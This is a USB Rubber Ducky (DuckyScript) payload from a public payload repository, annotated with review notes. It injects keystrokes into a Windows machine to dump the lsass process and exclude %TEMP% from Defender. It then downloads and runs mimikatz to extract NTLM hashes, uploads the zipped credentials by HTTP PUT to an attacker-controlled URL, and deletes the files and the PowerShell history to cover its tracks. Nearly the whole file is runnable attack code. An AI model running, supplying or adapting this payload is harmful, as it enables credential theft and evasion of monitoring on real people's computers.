GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/exfiltration/ExfiltrateWindowsCredentials/NetworkMedium/payload.txt
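REM Title: DuckyScript payload for data exfiltration over a network medium
REM Author: jakobfriedl
REM
REM Flow: passive OS check -> Task Manager dumps lsass to %TEMP%\lsass.DMP ->
REM elevated PowerShell excludes %TEMP% from Defender, downloads mimikatz,
REM parses the dump offline, zips log + NTLM lines, HTTP PUTs the zip to
REM #EXFIL_URL -> clean-up.
REM
REM Requirements / review notes:
REM  - The logged-on user must be a local administrator: Task Manager and
REM    PowerShell are started with CTRL-SHIFT ENTER and the UAC consent prompt
REM    is answered with ALT y. A standard user gets a credential prompt instead
REM    and the payload will not get past that point.
REM  - #SERVER_URL must serve /mimikatz.exe and #EXFIL_URL must accept an HTTP
REM    PUT. Both are plain HTTP: the tool download and the credential archive
REM    travel unencrypted.
REM  - The Task Manager keystrokes (search, SHIFT F10, UPARROW x5, ENTER) depend
REM    on the Task Manager layout/version; verify them on a matching test host.
REM  - Clean-up only removes files and the Defender exclusion. It does not cover
REM    event logs (Defender logs exclusion changes as event 5007; PowerShell
REM    script block logging, if enabled, records every typed command) and it
REM    deletes the user's entire PSReadLine history file, not just this session.
ATTACKMODE HID

REM OS Detection to ensure the target is Windows
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM Waits up to #MAX_WAIT * #CHECK_INTERVAL ms for the host to answer the
REM lock-LED report, then calls the host Windows when it issued more than
REM #WINDOWS_HOST_REQUEST_COUNT configuration requests. $_OS starts as
REM #NOT_WINDOWS (an arbitrary non-WINDOWS value) and is only changed on a match.

REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7

$_OS = #NOT_WINDOWS

VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
END_EXTENSION

REM Abort with a red LED when the host was not classified as Windows
IF ($_OS != WINDOWS)
LED_R
STOP_PAYLOAD
END_IF

REM Define the URL of the server hosting the mimikatz executable (no trailing slash)
DEFINE #SERVER_URL http://XXX.XXX.XXX.XXX

REM Define the URL of the webserver to exfiltrate the credentials to (no trailing slash)
DEFINE #EXFIL_URL http://XXX.XXX.XXX.XXX

DELAY 1000

REM Delete a dump file left over from a previous run. Runs unelevated via the
REM Run dialog; %TEMP% is user-writable so no UAC prompt is needed here.
GUI r
DELAY 200
STRINGLN powershell "rm $env:TEMP\lsass.DMP"
DELAY 200

REM Create lsass-dump using the TaskManager (elevated, UAC answered with ALT y):
REM jump to the lsass process, open its context menu with SHIFT F10, walk up to
REM the "Create dump file" entry, confirm, dismiss the "dump written" dialog.
REM Task Manager writes the dump to %TEMP%\lsass.DMP, which the mimikatz step
REM below relies on. Raise the DELAY after the first ENTER if the dump is not
REM finished before the dialog-dismissing ENTER on slow or busy hosts.
GUI r
DELAY 200
STRING taskmgr
CTRL-SHIFT ENTER
DELAY 500
ALT y
DELAY 500
DOWNARROW
DELAY 1000
STRING lsass
DELAY 500
SHIFT F10
$I = 0
WHILE ($I < 5)
UPARROW
$I = ($I + 1)
END_WHILE
ENTER
DELAY 500
ENTER
ALT F4

REM Open an elevated PowerShell (UAC consent answered with ALT y). Every
REM remaining command is typed into this one console.
GUI r
DELAY 200
STRING powershell.exe
CTRL-SHIFT ENTER
DELAY 500
ALT y
DELAY 500
REM Add exclusion path to the Windows Defender settings so the downloaded
REM mimikatz.exe is not quarantined. Only done when real-time protection is on;
REM the exclusion is removed again during clean-up. This is a logged Defender
REM configuration change and may be refused where Tamper Protection covers
REM exclusions.
STRINGLN if((Get-MpComputerStatus).RealTimeProtectionEnabled){Set-MpPreference -ExclusionPath $env:TEMP}

REM Download mimikatz.exe from webserver. Invoke-WebRequest is spelled out
REM instead of the "wget" alias (present in Windows PowerShell, absent in
REM PowerShell 7) and -OutFile instead of the "-o" prefix, which can be
REM ambiguous on newer PowerShell versions. -UseBasicParsing avoids the IE
REM first-launch parsing error on Windows PowerShell 5.1.
STRINGLN Invoke-WebRequest -UseBasicParsing #SERVER_URL/mimikatz.exe -OutFile $env:TEMP\mimikatz.exe
DELAY 1000

REM Execute mimikatz non-interactively: all commands are passed as arguments
REM and the trailing exit makes mimikatz terminate by itself, so the prompt
REM returns without depending on a timed CTRL c into an interactive session.
REM Output is logged to exfiltration.log in %TEMP%.
STRINGLN cd $env:TEMP
STRINGLN .\mimikatz.exe "privilege::debug" "log exfiltration.log" "sekurlsa::minidump lsass.DMP" "sekurlsa::logonpasswords" exit
DELAY 5000

REM Format mimikatz-log for exfiltration: keep every NTLM line plus the two
REM lines before it (user/domain context). NOTE(review): Get-Unique only drops
REM adjacent duplicates of a sorted list, so on this unsorted Select-String
REM output it likely removes nothing; kept as in the original.
STRINGLN cat .\exfiltration.log | Select-String -Pattern "NTLM" -Context 2,0 | Get-Unique > credentials.txt

REM Create zip archive of prepared data, named <COMPUTERNAME>-exfiltration-data.zip
DEFINE #archive $env:COMPUTERNAME'-exfiltration-data.zip'
STRING Compress-Archive -Force -Path $env:TEMP\exfiltration.log, $env:TEMP\credentials.txt -DestinationPath $env:TEMP\
STRINGLN #archive
DELAY 500

REM Exfiltration: HTTP PUT of the archive to #EXFIL_URL/<archive>. The "/"
REM between the base URL and the file name is typed explicitly; the original
REM concatenated them directly, producing an invalid host name.
STRING Invoke-WebRequest -UseBasicParsing -Method PUT -InFile $env:TEMP\
STRING #archive
SPACE
STRING -Uri #EXFIL_URL/
STRINGLN #archive
DELAY 500

REM Clean-up
REM Remove files: dump, tool, log, filtered output and the archive. The archive
REM is removed under its real name (the original removed a non-existent
REM data.zip and left <COMPUTERNAME>-exfiltration-data.zip in %TEMP%).
STRINGLN rm $env:TEMP\lsass.DMP
STRINGLN rm $env:TEMP\mimikatz.exe
STRINGLN rm $env:TEMP\exfiltration.log
STRINGLN rm $env:TEMP\credentials.txt
STRING rm $env:TEMP\
STRINGLN #archive
REM Reset configurations: drop the Defender exclusion again (a harmless error
REM if it was never added because real-time protection was off)
STRINGLN Remove-MpPreference -ExclusionPath $env:TEMP
REM Delete Powershell history and close the elevated console (the original
REM left it open on screen). Deleting the file and exiting on the same line
REM should keep a later command from re-creating the history file.
STRINGLN rm (Get-PSReadLineOption).HistorySavePath; exit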